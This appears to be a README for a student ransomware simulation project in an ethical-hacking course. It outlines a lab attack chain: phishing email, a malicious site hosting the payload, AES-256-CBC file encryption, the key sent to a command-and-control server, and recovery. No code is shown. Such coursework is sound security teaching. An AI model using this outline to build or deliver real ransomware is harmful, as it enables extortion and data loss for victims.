This project is a Crypto Ransomware Simulation developed for the course:
CST-7413 – Ethical Hacking and Penetration Testing
Faculty of Computer System and Technologies
University of Information Technology
Academic Year: 2025–2026
The project demonstrates a complete ransomware attack lifecycle in a controlled laboratory environment, including phishing delivery, payload execution, file encryption, command-and-control communication, and recovery.
This project was created strictly for educational and cybersecurity research purposes.
All experiments were conducted in an isolated lab environment.
The objectives of this simulation include:
- Demonstrating how ransomware attacks are delivered through phishing campaigns
- Understanding encryption techniques used by ransomware
- Studying command-and-control communication
- Practicing incident response and recovery
- Improving cybersecurity awareness and defensive strategies
The ransomware simulation replicates a typical ransomware attack workflow:
- Phishing Email Campaign
- Malicious Website Hosting
- Payload Delivery
- File Encryption
- Command & Control Communication
- Recovery Process
This allows cybersecurity students to observe how ransomware attacks operate and how defenders can respond.
- Kali Linux
- Windows 10 / Windows 11
- Python 3
- PyCryptodome
- Kali Linux penetration testing tools
- PyInstaller
- Apache Web Server
- Netlify (website hosting)
- Gmail SMTP (email delivery)
Attacker Machine (Kali Linux)
│
├── Phishing Email Script
├── Malicious Website
├── Ransomware Builder
└── Command & Control Server
│
│
▼ Victim Machine (Windows)
│
├── Downloads payload
├── Executes ransomware
└── Files encrypted
│
▼ Encryption key sent to attacker server
│ ▼ Recovery tool provided to decrypt files
The ransomware simulation uses:
- AES-256 encryption
- CBC encryption mode
- Random key generation
- Secure initialization vectors (IV)
This reflects techniques used by modern ransomware families.
The simulation was tested using the following steps:
- Deploy malicious website
- Send phishing email to victim machine
- Victim downloads executable payload
- Ransomware encrypts files
- Encryption key transmitted to attacker server
- Recovery tool sent to victim for decryption
The experiment demonstrates the full attack chain from initial compromise to recovery.
This project was created for educational purposes only.
The techniques demonstrated in this repository are intended to help students and security professionals:
- Understand ransomware behavior
- Improve detection and prevention methods
- Train in cybersecurity incident response
❗ Do not use this code for malicious activities.
The author is not responsible for any misuse of this project.
Possible future enhancements include:
- Polymorphic ransomware simulation
- Lateral movement simulation
- Machine learning–based ransomware detection
- Network anomaly monitoring
- Security awareness training modules
Thaw Htet Swann — 4CSEC-1601
Kyaw Min Wai — 4CSEC-1919
Faculty of Computer System and Technologies
University of Information Technology
-
MITRE ATT&CK Framework
https://attack.mitre.org -
NIST Cybersecurity Framework
https://www.nist.gov/cyberframework -
CISA Ransomware Guide
https://www.cisa.gov/stopransomware -
PyCryptodome Documentation
https://pycryptodome.readthedocs.io -
Kali Linux Documentation
https://www.kali.org/docs/
All experiments described in this project were conducted in a controlled laboratory environment with proper authorization.
This project aims to improve cybersecurity education and ransomware defense research.